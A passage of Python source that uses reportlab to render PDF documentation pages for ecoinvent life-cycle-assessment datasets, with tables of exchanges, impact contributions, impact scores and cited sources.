large_table_style), \n '%s %s' % (utils.arrange_float(sel.iloc[0]['amount']), sel.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n try:\n if f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1]:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n except:\n pass\n Story.append(t)\n if (not hasattr(f, 'dataGeneratorAndPublication')) or f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(1,0),(1,0),'RIGHT'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (1,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ]\n sel = exchange_df[exchange_df['group'] == 'FromTechnosphere']\n colWidths = [5.8*inch, amount_width]\n cats = ['allocatable product', 'Recyclable', 'Waste']\n for cat in cats:\n table_style_ = deepcopy(table_style)\n sel1 = sel[sel['By-product classification'] == cat]\n if len(sel1) > 0:\n if cat == 'allocatable product':\n s = 'Inputs from technosphere'\n elif cat == 'Waste':\n s = 'Inputs from technosphere, wastes' + '*'*stars\n footnotes.append(('*'*stars, 'A negative input indicates a by-product output of waste.'))\n stars += 1\n else:\n s = 'Inputs from technosphere, recyclable materials' + '*'*stars\n footnotes.append(('*'*stars, 'A negative input indicates a by-product output of recyclable material.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n name = f.get_reference_product().name\n name_list = list(set(sel1['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel2 = sel1[sel1['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_consequential(exchange_df, Story):\n sel = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n colWidths = [4.9*inch, 0.9*inch, amount_width]\n table_style = [\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey)]\n s = 'Reference product'\n stars = 1\n footnotes = []\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity, or a market linking to treatment activities.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Material for treatment', large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_content.append([Paragraph(sel.iloc[0]['name'], large_table_style),\n Paragraph(sel.iloc[0]['mft'], large_table_style), \n '%s %s' % (utils.arrange_float(sel.iloc[0]['amount']), sel.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n if f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1]:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(t)\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (1,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black)\n ]\n sel = exchange_df[exchange_df['group'] == 'FromTechnosphere']\n sel = sel[sel['mft'] == 'no']\n colWidths = [5.8*inch, amount_width]\n l = [('normal', sel[sel['amount'] > 0], ''), \n ('credit', sel[sel['amount'] < 0], \n 'Following the consequential approach, these negative inputs act as credits for avoided production.'), \n ('wastes', exchange_df[exchange_df['mft'] == 'yes'], \n 'These exchanges listed as negative inputs are by-products requiring treatment. They carry the burdens of their treatments, and include credits for beneficial treatment in this system model.')\n ]\n for material, sel1, explanations in l:\n if len(sel1) > 0:\n if material == 'normal':\n s = 'Inputs from technosphere'\n if material == 'credit':\n s = 'Inputs from technosphere, credit for by-products'\n s += '*'*stars\n footnotes.append(('*'*stars, explanations))\n stars += 1\n if material == 'wastes':\n s = 'Inputs from technosphere, wastes'\n s += '*'*stars\n footnotes.append(('*'*stars, explanations))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_style_ = deepcopy(table_style)\n name = f.get_reference_product().name\n name_list = list(set(sel1['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel2 = sel1[sel1['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_APOS(exchange_df, Story):\n sel = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n colWidths = [4.9*inch, 0.9*inch, amount_width]\n table_style = [\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ('ALIGN',(0,0),(-1,0),'CENTRE'),\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1), \n ('INNERGRID', (0,0), (-1,0), thin_line, colors.white), \n ('INNERGRID', (0,1), (-1,-1), thin_line, colors.black), \n ('BACKGROUND', (0, 0), (-1, 0), colors.lightgrey)]\n s = 'Reference product'\n stars = 1\n footnotes = []\n if sel['amount'].min() < 0.:\n s += '*'*stars\n footnotes.append(('*'*stars, 'A negative reference product amount indicates a waste treatment activity or a market linking to treatment activities.'))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Material for treatment', large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_content.append([Paragraph(sel.iloc[0]['name'], large_table_style),\n Paragraph(sel.iloc[0]['mft'], large_table_style), \n '%s %s' % (utils.arrange_float(sel.iloc[0]['amount']), sel.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n if f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1]:\n Story.append(confidential)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(t)\n if f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (1,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black)\n ]\n sel = exchange_df[exchange_df['group'] == 'FromTechnosphere']\n colWidths = [5.8*inch, amount_width]\n l = [('no', sel[sel['mft'] == 'no'], ''), \n ('yes', sel[sel['mft'] == 'yes'], 'A negative input represents an output of by-product requiring treatment. It carries the burdens of its treatment, and a credit for beneficial treatment calculated by allocation in this system model.' \n )]\n for material, sel1, explanations in l:\n if len(sel1) > 0:\n if material == 'no':\n s = 'Inputs from technosphere'\n if material == 'yes':\n s = 'Inputs from technosphere, wastes'\n s += '*'*stars\n footnotes.append(('*'*stars, explanations))\n stars += 1\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n table_style_ = deepcopy(table_style)\n name = f.get_reference_product().name\n name_list = list(set(sel1['name']))\n name_list.sort()\n if name in name_list:\n name_list.remove(name)\n name_list.insert(0, name)\n for name in name_list:\n sel2 = sel1[sel1['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style_))\n Story.append(t)\n return Story, footnotes\ndef exchange_summary_elementary(exchange_df, Story):\n table_style = [\n ('TOPPADDING', (0,0), (-1,-1), 1),\n ('BOTTOMPADDING', (0,0), (-1,-1), 1),\n ('VALIGN',(0,0),(-1,-1),'MIDDLE'), #valign middle for all\n ('HALIGN',(0,1),(-1,0),'MIDDLE'), #valign middle for all\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), #black text for all\n ('BACKGROUND',(0,0),(-1,0), colors.lightgrey), \n ('INNERGRID', (0,0), (-1,0),thin_line, colors.white), #grid after the header\n ('INNERGRID', (0,1), (-1,-1),thin_line, colors.black), #grid after the header\n ]\n colWidths = [5.8*inch, amount_width]\n for compartment, s in [('natural resource', 'Inputs from environment'), \n ('air', 'Emissions to air'), ('water', 'Emissions to water'), \n ('soil', 'Emissions to soil')]:\n sel = exchange_df[exchange_df['compartment'] == compartment]\n if len(sel) > 0:\n table_content = [[Paragraph('%s' % s, large_table_style), \n Paragraph('Amount', large_table_style)]]\n l = list(set(sel['name']))\n l.sort()\n for name in l:\n sel2 = sel[sel['name'] == name]\n amount = sel2['amount'].sum()\n table_content.append([Paragraph(name, large_table_style),\n '%s %s' % (utils.arrange_float(amount), sel2.iloc[0]['unitName'])])\n if 'Transformation, from unspecified' in name:\n pass\n #1/0\n #print inner_table\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story\ndef write_footnotes(Story, footnotes):\n if len(footnotes) > 0:\n #Story[-1].keepWithNext = True\n for footnote in footnotes:\n Story.append(Paragraph('%s%s' % footnote, small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n return Story\ndef amount_cell(f, sel, i, A):\n rel_contrib = get_relative_contributions(f, sel.iloc[i], A)\n contrib_arranged = []\n for k in range(len(rel_contrib)):\n contrib_arranged.append(rel_contrib[k] + '%')\n a = [[Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)],\n [Paragraph(' | '.join(contrib_arranged), small_justified_contrib)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('LEFTPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('RIGHTPADDING', (0,0), (-1,-1), 0))\n a.setStyle(TableStyle(table_style_a))\n return a\ndef Technosphere_table(f, exchange_df, Story, ao, logs, A):\n tags = {'ReferenceProduct': 'Reference product', \n 'ReferenceProducts': 'Reference products', \n 'ByProduct': 'By-product', \n 'ByProducts': 'By-products', \n 'FromTechnosphere': 'Input from technosphere', \n 'FromTechnospheres': 'Inputs from technosphere', \n }\n Story.append(Paragraph('
Detailed information for exchanges', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n Story = contribution_to_impact_legend(Story)\n for group in ['ReferenceProduct', 'ByProduct', 'FromTechnosphere']:\n sel = exchange_df[exchange_df['group'] == group].sort(columns = 'name')\n if len(sel) > 0:\n if group == 'FromTechnosphere' and f.specialActivityType in [1, 10]:\n ref = f.get_reference_product()\n sel_ = sel[sel['name'] == ref.name]\n sel_ = sel_.sort('amount', ascending = False)\n sel = pandas.concat([sel_, sel[sel['name'] != ref.name]])\n #setting up the header\n if len(getattr(f, group)) > 1:\n tag = tags[group+'s']\n else:\n tag = tags[group]\n if group == 'FromTechnosphere':\n if f.get('modellingAndValidation').get('systemModelName') == 'Undefined':\n colWidths = [7.*inch - amount_width, amount_width]\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Amount', large_table_style)]]\n else:\n colWidths = [7.*inch - amount_width, amount_width]\n if len(indicators_for_contrib_short) > 0:\n a = [[Paragraph('Amount', large_table_style)],\n [Paragraph('impact contributions', small_justified_contrib)]]\n else:\n a = [[Paragraph('Amount', large_table_style)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 0))\n a.setStyle(TableStyle(table_style_a))\n table_content = [[Paragraph('%s' % tag, large_table_style), a]]\n else:\n colWidths = [7.*inch - amount_width - prod_vol_width,\n prod_vol_width, amount_width]\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Annual prod.vol.', large_table_style), \n Paragraph('Amount', large_table_style)\n ]]\n table_style = []\n for i in range(len(sel)):\n if group == 'FromTechnosphere':\n if f.get('modellingAndValidation').get('systemModelName') == 'Undefined':\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n else:\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n amount_cell(f, sel, i, A)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n else: #byproduct or reference product\n if utils.is_empty(sel.iloc[i]['productionVolumeAmount']) or sel.iloc[i]['productionVolumeAmount'] == 0.:\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('NA', small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n else:\n prod_vol = utils.arrange_float(sel.iloc[i]['productionVolumeAmount'])\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('%s %s' % (prod_vol,sel.iloc[i]['unitName']), small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n to_write, logs, length_to_write = arrange_comments(f, sel.iloc[i], ao, logs)\n line = ['']*len(colWidths)\n line[0] = to_write\n inner_table.append(line)\n inner_t = Table(inner_table, colWidths = colWidths)\n inner_t.setStyle(TableStyle(inner_table_style))\n line = ['']*len(colWidths)\n line[0] = inner_t\n if sel.iloc[i]['amount'] != 0.:\n table_content.append(line)\n table_style.append(('SPAN',(0,len(table_content)-1),(-1,len(table_content)-1)))\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n table_style.append(('LEFTPADDING', (0,1), (0,-1), 0))\n table_style.append(('TOPPADDING', (0,1), (0,-1), 0))\n table_style.extend(h_header)\n table_style.append(('BOTTOMPADDING', (0,0), (-1,1), 3))\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story, logs\ndef Technosphere_table_linked_market(f, exchange_df, Story, ao, logs, A):\n Story.append(Paragraph('Detailed information for exchanges', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n p = 'To help better understand this market dataset, inputs from technosphere are displayed in distinct categories: supplies to the market as one category, then losses and other inputs if they occur within the market. '\n Story.append(Paragraph(p, no_info_style))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story = contribution_to_impact_legend(Story)\n to_write = []\n group = 'ReferenceProduct'\n sel = exchange_df[exchange_df['group'] == group].sort(columns = 'name')\n to_write.append(('Reference product', 'Reference product', sel.copy()))\n group = 'FromTechnosphere'\n sel = exchange_df[exchange_df['group'] == group].sort(columns = 'name')\n ref = f.get_reference_product()\n supply_of_reference_product = sel[sel['name'] == ref.name]\n supply_of_reference_product = supply_of_reference_product.sort('amount', ascending = False)\n loss = supply_of_reference_product[supply_of_reference_product[\n 'activityLinkId'] == f.id]\n if len(loss) > 0:\n supply_of_reference_product = supply_of_reference_product[supply_of_reference_product[\n 'activityLinkId'] != f.id]\n if len(supply_of_reference_product) == 1:\n to_write.append(('input of reference product', 'Input of %s' % ref.name, supply_of_reference_product.copy()))\n else:\n to_write.append(('input of reference product', 'Inputs of %s' % ref.name, supply_of_reference_product.copy()))\n if len(loss) > 0:\n to_write.append(('losses', 'Compensation for losses', loss.copy()))\n supply_of_others = sel[sel['name'] != ref.name]\n if len(supply_of_others) == 1:\n to_write.append(('Other', 'Other input from technosphere', supply_of_others.copy()))\n elif len(supply_of_others) > 1:\n to_write.append(('Other', 'Other inputs from technosphere', supply_of_others.copy()))\n for section, tag, sel in to_write:\n if section == 'Reference product':\n colWidths = [7.*inch - amount_width - prod_vol_width,\n prod_vol_width, amount_width]\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Annual prod.vol.', large_table_style), \n Paragraph('Amount', large_table_style)\n ]]\n else:\n colWidths = [7.*inch - amount_width, amount_width]\n if len(indicators_for_contrib_short) > 0:\n a = [[Paragraph('Amount', large_table_style)],\n [Paragraph('impact contributions', small_justified_contrib)]]\n else:\n a = [[Paragraph('Amount', large_table_style)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 0))\n a.setStyle(TableStyle(table_style_a))\n table_content = [[Paragraph('%s' % tag, large_table_style), a]]\n table_style = []\n for i in range(len(sel)):\n if tag != 'Reference product':\n exc = find_exc(sel.iloc[i], f)\n if 'Compensation for ' in tag:\n name = exc.name\n else:\n name = '%s - %s' % find_activityLink(exc)\n if '<' in name:\n pieces = name.split('<')\n new_name = '%s' % (ecoinvent_red, pieces[0])\n for piece in pieces[1:]:\n new_name += '<' % ecoinvent_red\n new_name += '%s' % (ecoinvent_red, piece)\n name = copy(new_name)\n inner_table = [[Paragraph(name, small_table_style), \n amount_cell(f, sel, i, A)]]\n else: \n prod_vol = utils.arrange_float(sel.iloc[i]['productionVolumeAmount'])\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph('%s %s' % (prod_vol,sel.iloc[i]['unitName']), small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n to_write, logs, length_to_write = arrange_comments(f, sel.iloc[i], ao, logs, \n AL = section in ['losses', 'Other'])\n line = ['']*len(colWidths)\n line[0] = to_write\n inner_table.append(line)\n inner_t = Table(inner_table, colWidths = colWidths)\n inner_t.setStyle(TableStyle(inner_table_style))\n line = ['']*len(colWidths)\n line[0] = inner_t\n if sel.iloc[i]['amount'] != 0.:\n table_content.append(line)\n table_style.append(('SPAN',(0,len(table_content)-1),(-1,len(table_content)-1)))\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n #table_style.append(('LEFTPADDING', (0,1), (0,-1), 0))\n #table_style.append(('TOPPADDING', (0,1), (0,-1), 0))\n table_style.extend(h_header)\n #table_style.append(('BOTTOMPADDING', (0,0), (-1,1), 3))\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story, logs\ndef Environment_table(f, exchange_df, Story, logs):\n colWidths = [7.*inch - amount_width - subcompartment_width, subcompartment_width, amount_width]\n for compartment in ['natural resource', 'air', 'water', 'soil']:\n sel = exchange_df[exchange_df['compartment'] == compartment].sort(columns = 'name')\n if len(sel) > 0:\n tag = compartment_header(compartment)\n table_content = [[Paragraph('%s' % tag, large_table_style), \n Paragraph('Subcompartment', large_table_style), \n Paragraph('Amount', large_table_style)]]\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n if len(indicators_for_contrib_short) > 0:\n a = [[Paragraph('Amount', large_table_style)],\n [Paragraph('impact contributions', small_justified_contrib)]]\n else:\n a = [[Paragraph('Amount', large_table_style)]]\n a = Table(a, colWidths = [amount_width])\n table_style_a = []\n table_style_a.append(('TOPPADDING', (0,0), (-1,-1), 0))\n table_style_a.append(('BOTTOMPADDING', (0,0), (-1,-1), 3))\n a.setStyle(TableStyle(table_style_a))\n table_content[0][-1] = deepcopy(a)\n table_style = []\n for i in range(len(sel)):\n inner_table = [[Paragraph(sel.iloc[i]['name'], small_table_style), \n Paragraph(sel.iloc[i]['subcompartment'], small_table_style),\n Paragraph('%s %s' % (utils.arrange_float(sel.iloc[i]['amount']), \n sel.iloc[i]['unitName']), small_table_style)]]\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n inner_table[0][-1] = amount_cell(f, sel, i, A)\n inner_table[0][0].frags[0].textColor = colors.HexColor(ecoinvent_red)\n to_write, logs, length_to_write = arrange_comments(f, sel.iloc[i], ao, logs)\n line = ['']*len(colWidths)\n line[0] = to_write\n inner_table.append(line)\n inner_t = Table(inner_table, colWidths = colWidths)\n inner_t.setStyle(TableStyle(inner_table_style))\n line = ['']*len(colWidths)\n line[0] = inner_t\n table_content.append(line)\n table_style.append(('SPAN',(0,len(table_content)-1),(-1,len(table_content)-1)))\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n table_style.append(('LEFTPADDING', (0,1), (0,-1), 0))\n table_style.append(('TOPPADDING', (0,1), (0,-1), 0))\n table_style.extend(h_header)\n table_style.append(('BOTTOMPADDING', (0,0), (-1,1), 3))\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story, logs\ndef impact_scores(Story, f):\n Story.append(Spacer(1, inter_par_dist))\n Story.append(Paragraph('Selected impact assessment results', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n table_content = [[Paragraph('method', large_table_style), \n Paragraph('category', large_table_style), \n Paragraph('indicator', large_table_style), \n Paragraph('score', large_table_style)]]\n for exc in f.ReferenceProduct:\n if exc.amount != 0:\n break\n ie = (f.activityName, f.geography, exc.name)\n scores = utils.pkl_load(scores_path, str(indexes.toggle['ie'][ie]))\n for LCIA in indicators:\n method, category, indicator = LCIA\n try:\n s = scores[indexes.toggle['LCIA'][LCIA],0]\n except IndexError:\n s = scores[0,indexes.toggle['LCIA'][LCIA]]\n table_content.append([Paragraph(method, large_table_style), \n Paragraph(category, large_table_style), \n Paragraph(indicator, large_table_style), \n Paragraph('%s %s' % (utils.arrange_float(s, significative_digits = 4), \n indexes.units[LCIA]), large_table_style)])\n colWidths = [2.*inch, 1.75*inch, 1.75*inch, 1.5*inch]\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(h_header))\n Story.append(t)\n Story.append(Spacer(1, inter_par_dist))\n return Story, ie\ndef print_source_list(Story, exchange_df, f, MD):\n if len(exchange_df) > 0:\n s = set(exchange_df['sourceId'])\n else:\n s = set()\n try:\n if (hasattr(f.dataGeneratorAndPublication, 'publishedSourceId') and \n f.dataGeneratorAndPublication.publishedSourceId != None):\n s.add(f.dataGeneratorAndPublication.publishedSourceId)\n except:\n pass\n source_list = set()\n for source in s:\n if not utils.is_empty(source) and type(source) == str:\n source_list.add(source)\n Story.append(Paragraph('Source', title_style))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n source_list = list(source_list)\n if len(source_list) > 0:\n md = MD['Sources'].loc[source_list]\n if not (len(md) == 1 and source_list[0] not in MD['Sources'].index):\n headers = ['firstAuthor', 'additionalAuthors', 'title', 'year', 'journal', \n 'volumeNo', 'issueNo']\n tags = ['First author', 'Additional author(s)', 'Title', 'Year', 'Journal', \n 'Volume number', 'Issue number']\n header_to_tag = dict(zip(headers, tags))\n table_content = [[Paragraph('Source information', header_style)]]\n for i in range(len(md)):\n to_write = []\n for header in headers:\n if type(md.iloc[i][header]) in [str] and not utils.is_empty(md.iloc[i][header]):\n to_write.append(Paragraph('%s: %s' % (header_to_tag[header], md.iloc[i][header]), header_style))\n table_content.append([to_write])\n t = Table(table_content, colWidths = [7*inch], splitByRow = 1, repeatRows = 1)\n t.setStyle(TableStyle(h_header))\n Story.append(t)\n else:\n Story.append(Paragraph('No source cited in this dataset', no_info_style))\n return Story\ndef render(Story, f, doc, version):\n pieces = utils.break_pieces(f.activityName, 80)\n pieces[-1] += ' - ' + f.geography\n def myFirstPage(canvas, doc):\n canvas.saveState()\n canvas.setFont('Helvetica-Bold',16)\n header_text = 'Ecoinvent %s dataset documentation' % version\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-35, header_text)\n canvas.setFont('Helvetica',9)\n height = 50\n for piece in pieces:\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-height, piece)\n height += .15*inch\n canvas.drawImage(logo_path, MARGIN*1.3, 750, width = inch, preserveAspectRatio = True)\n canvas.drawCentredString(PAGE_WIDTH/2.0, 35, 'page %s' % canvas.getPageNumber())\n canvas.restoreState()\n def myLaterPages(canvas, doc):\n canvas.saveState()\n if canvas.getPageNumber() == 1:\n canvas.setFont('Helvetica-Bold',16)\n header_text = 'Ecoinvent %s dataset documentation' % version\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-35, header_text)\n canvas.setFont('Helvetica',9)\n height = 50\n else:\n canvas.setFont('Helvetica', 9)\n header_text = 'Ecoinvent %s dataset documentation' % version\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-35, header_text)\n height = 45\n for piece in pieces:\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-height, piece)\n height += .15*inch\n canvas.drawImage(logo_path, MARGIN*1.3, 750, width = inch, preserveAspectRatio = True)\n canvas.drawCentredString(PAGE_WIDTH/2.0, 35, 'page %s' % canvas.getPageNumber())\n canvas.restoreState()\n doc.pageTemplates[0].beforeDrawPage = myFirstPage\n doc.pageTemplates[1].beforeDrawPage = myLaterPages\n doc.build(Story)\n return doc\ndef find_total_score(f):\n for exc in f.ReferenceProduct:\n if exc.amount != 0:\n break\n ie = (f.activityName, f.geography, exc.name)\n #gff.corrections(ie_name)\n scores = utils.pkl_load(scores_path, str(indexes.toggle['ie'][ie]))\n total_scores = []\n for LCIA_for_contribution in indicators_for_contrib:\n try:\n total_scores.append(scores[indexes.toggle['LCIA'][LCIA_for_contribution],0])\n except IndexError:\n total_scores.append(scores[0,indexes.toggle['LCIA'][LCIA_for_contribution]])\n return total_scores\ndef contribution_to_impact_legend(Story):\n if len(indicators_for_contrib_short) > 0:\n t = 'Impact contribution legend: %s, %s' % (\n ' | '.join(indicators_for_contrib_short), \n 'relative to dataset total score')\n Story.append(Paragraph(t, small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n return Story\ndef filelist_with_filtered_ao(ao):\n filelist = set()\n if 1:\n sel = ao[ao['activityName'].isin([\n 'market for methanol'])]\n sel = sel[sel['geography'].isin(['GLO'])]\n filelist.update(set(sel['filename']))\n elif 0:\n sel = ao[ao['activityName'] == 'electricity, high voltage, production mix']\n sel = sel[sel['geography'].isin(['ENTSO-E'])]\n filelist.update(set(sel['filename']))\n else:\n ao = ao.set_index(['activityName', 'geography']).sort_index(level=0)\n indexes = [('electricity production, photovoltaic, 3kWp slanted-roof installation, single-Si, panel, mounted', 'CH'), \n ('heat production, at heat pump 30kW, allocation exergy', 'CH'), \n('operation, solar collector system, Cu flat plate collector, multiple dwelling, for hot water', 'CH'), \n('heat production, natural gas, at boiler condensing modulating <100kW', 'CH'), \n('heat production, wood pellet, at furnace 300kW, state-of-the-art 2014', 'CH'), \n('tap water production, conventional treatment', 'CH'), \n('paper production, woodfree, coated, at non-integrated mill', 'RER'), \n('treatment of wastewater, average, capacity 1.6E8l/year', 'CH'), \n('treatment of 